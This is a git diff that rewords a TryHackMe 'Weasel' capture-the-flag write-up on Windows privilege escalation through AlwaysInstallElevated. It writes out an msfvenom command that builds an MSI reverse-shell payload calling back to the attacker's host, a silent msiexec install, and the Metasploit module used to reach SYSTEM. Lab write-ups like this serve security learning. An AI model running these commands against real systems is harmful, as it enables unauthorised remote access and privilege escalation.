F41zK4r1m/TryHackMe/Weasel.md

 ## Privilege Escalation:

-After gaining access to the low privilege user & getting user flag, I started seraching for the privilege esclation vectors.
-I executed WinPeas to check for the all possible privilege escalation vectors & observed some juicy results in "AlwaysInstallElevated" privilege.
-I found that AlwaysInstallElevated is set to '1' in both HKLM & HKCU.
+After gaining access to the low privilege user and retrieving the user flag, I began searching for potential privilege escalation vectors.
+I executed WinPEAS to check for all possible vectors and discovered some interesting results related to the "AlwaysInstallElevated" privilege.
+I found that "AlwaysInstallElevated" was set to '1' in both HKLM (HKEY_LOCAL_MACHINE) and HKCU (HKEY_CURRENT_USER) registries.

 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/1847e73d-72f2-4c3c-9eb2-be7bc8ce9f30)

-When checked on [hacktrickz website](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated) how to exploit this vulnerability to perform Privesc, I found that user with any privilege can install ".msi" files with SYSTEM privilege.
+Upon further research on the [hacktrickz website](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated) regarding how to exploit this vulnerability for privilege escalation, I discovered that any user with privileges can install ".msi" files with SYSTEM privileges.

-So, I followed the steps & created a .msi file using 'msfvenom'
+Following the provided steps, I created an ".msi" file using 'msfvenom':

 ```bash
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f msi -o update.msi
 ```
-Uploaded the "update.msi" to the windows system & executed it:
+I uploaded the "update.msi" file to the Windows system and executed it:

 ```
 msiexec /quiet /qn /i update.msi
 ```

-But for some reason I didn't get the revershell back to my kali machine.
-I checked further about why my exploit is not working, I found in a blog that:
+However, I did not receive a reverse shell back to my Kali machine for some reason.
+While investigating why my exploit was not working, I came across a blog that provided some insights:

 ```
 When you run msiexec directly in your SSH session, it uses the current user's privileges and permissions to execute the command.
 If the user account "dev-datasci-lowpriv" does not have sufficient privileges or lacks necessary permissions, it could result in the failure of the msiexec command.

 However, when you use runas /user:dev-datasci-lowpriv to execute msiexec, it runs the command under a different process with the specified user's credentials.
 This effectively elevates the privileges of the command, potentially bypassing any restrictions or permission issues associated with the current user account.
 ```
-So, I can execute the "msiexec" using the runas command but I don't have the current user credentials.
+So, I can execute "msiexec" using the "runas" command, but I do not have the current user's credentials.

 ### Metasploit:

-Then used Metasploit to escalate my privileges.
-So, intially I created a session using metasploit & then migrated myself into the other higher privilege process.
+Next, I utilized Metasploit to escalate my privileges.
+Firstly, I created a session using Metasploit and then migrated myself to another process with higher privileges.

-I migrated myself because when I checked current privilege, I found myself running as a low level user with session 0.
+The reason for migration was that when I checked my current privilege level, I discovered that I was running as a low-level user in session 0.
 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/58049932-d767-4378-85d6-147329a4d40f)

-After migrating myself now, I am having a higher privelege with session 1.
+After successfully migrating, I obtained a higher privilege level in session 1.
 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/1a1f5905-8429-4bf9-8bf1-9df1105b3a84)

-Now, after the having the higher privilege I searched for the module in metasploit to exploit the "AlwaysInstallElevated" vulnerability & I found it as well under:
+With the elevated privileges, I proceeded to search for a suitable module in Metasploit to exploit the "AlwaysInstallElevated" vulnerability.
+I located the module under:

 ```bash
 exploit/windows/local/always_install_elevated
 ```
 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/b6de0588-9ec4-4afc-9a56-4a603493bc12)

-I used the module, changed the variables & finally got a session as "NT AUTHORITY\SYSTEM", after which I got root flag as well.(pwn3d!🙂)
+I utilized the module, modified the variables accordingly, and successfully obtained a session as "NT AUTHORITY\SYSTEM," granting me root privileges.
+Consequently, I was able to retrieve the root flag as well. (pwn3d!🙂)

 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/509626d7-dc80-4d2b-b7e3-c2a073ef8526)